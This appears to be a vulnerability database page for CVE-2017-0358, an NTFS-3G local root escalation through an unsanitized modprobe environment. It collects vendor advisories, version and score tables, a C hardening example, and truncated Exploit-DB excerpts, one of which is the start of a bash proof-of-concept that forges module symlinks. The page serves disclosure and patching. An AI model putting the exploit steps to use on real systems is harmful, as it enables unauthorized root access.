CVE-2017-0358
Published: 2018-04-13
Priority: P3 (46), high · CVSS 3.1: 7.8
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.28% (80.9th percentile)
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
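The hardening pattern for this class of bug, as an added example (not code from NTFS-3G or from any advisory on this page): a privileged helper runs an external program with a fixed environment via `execve()` instead of inheriting the caller's, so variables such as `MODPROBE_OPTIONS` never reach it. `run_helper`, `CLEAN_ENV` and the `/bin/sh` probe standing in for modprobe are assumptions made for the illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the child: nothing from the caller survives. */
static char *const CLEAN_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Fork, exec `path` (absolute), return the child's exit status, -1 on failure.
 * scrub != 0: execve() with CLEAN_ENV.
 * scrub == 0: execv(), which inherits the caller's environment, i.e. the
 *             unscrubbed behaviour the advisory describes. */
static int run_helper(const char *path, char *const argv[], int scrub)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (scrub)
            execve(path, argv, CLEAN_ENV);
        else
            execv(path, argv);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Constructed probe standing in for modprobe: the child exits 1 if
 * MODPROBE_OPTIONS is visible in its environment, 0 if it is not. */
static int child_sees_modprobe_options(int scrub)
{
    char *const argv[] = { "sh", "-c", "[ -z \"${MODPROBE_OPTIONS+set}\" ]", NULL };
    setenv("MODPROBE_OPTIONS", "constructed-sample-value", 1);
    return run_helper("/bin/sh", argv, scrub);
}

int main(void)
{
    /* Inherited environment leaks the variable; scrubbed one does not. */
    return !(child_sees_modprobe_options(0) == 1 &&
             child_sees_modprobe_options(1) == 0);
}
```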
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | ntfs-3g | < ntfs-3g 1:2016.2.22AR.1-4 (bookworm) | ntfs-3g 1:2016.2.22AR.1-4 (bookworm) |
| ntfs-3g | ntfs-3g | — | — |
| tuxera | ntfs-3g | <= 2016.2.22 | — |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
CVSS provenance
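| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 7.8 | HIGH | — |
| vendor_debian | — | 7.8 | HIGH | — |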
Ubuntu
NTFS-3G vulnerability
vendor_ubuntu·2017-02-01
Title: NTFS-3G vulnerability
Summary: NTFS-3G could be made to load kernel modules as an administrator.
Jann Horn discovered that NTFS-3G incorrectly filtered environment variables
when using the modprobe utility. A local attacker could possibly use this issue
to load arbitrary kernel modules.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
vendor_debian·2017·CVSS 7.8
Scope: local
bookworm: resolved (fixed in 1:2016.2.22AR.1-4)
bullseye: resolved (fixed in 1:2016.2.22AR.1-4)
forky: resolved (fixed in 1:2016.2.22AR.1-4)
sid: resolved (fixed in 1:2016.2.22AR.1-4)
trixie: resolved (fixed in 1:2016.2.22AR.1-4)
GHSA
ghsa_unreviewed·2022-05-13
CVE-2017-0358 [HIGH] CWE-269 GHSA-vghw-r4fc-pgpf
OSV
osv·2018-04-13·CVSS 7.8
No detection rules found.
Exploit-DB
ntfs-3g - Unsanitized modprobe Environment Privilege Escalation
exploitdb·2017-02-14
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
ntfs-3g is installed by default e.g. on Ubuntu and comes with a setuid root program /bin/ntfs-3g. When this program is invoked on a system whose kernel does not support FUSE filesystems (detected by get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using /sbin/modprobe via load_fuse_module().

The issue is that /sbin/modprobe is not designed to run in a setuid context. As the manpage of modprobe explicitly points out:

    The MODPROBE_OPTIONS environment variable can also be used
    to pass arguments to modprobe.

Therefore, on a system that does not seem to support FUSE filesystems, an attacker can set the environment variable MODPROBE_OPTION
Exploit-DB
ntfs-3g (Debian 9) - Local Privilege Escalation
exploitdb·2017-02-03·CVSS 7.8
---
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln
Metasploit
Debian/Ubuntu ntfs-3g Local Privilege Escalation
metasploit
ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user.
http://www.openwall.com/lists/oss-security/2017/02/04/1
http://www.securityfocus.com/bid/95987
https://marc.info/?l=oss-security&m=148594671929354&w=2
https://security.gentoo.org/glsa/201702-10
https://www.debian.org/security/2017/dsa-3780
https://www.exploit-db.com/exploits/41240/
https://www.exploit-db.com/exploits/41356/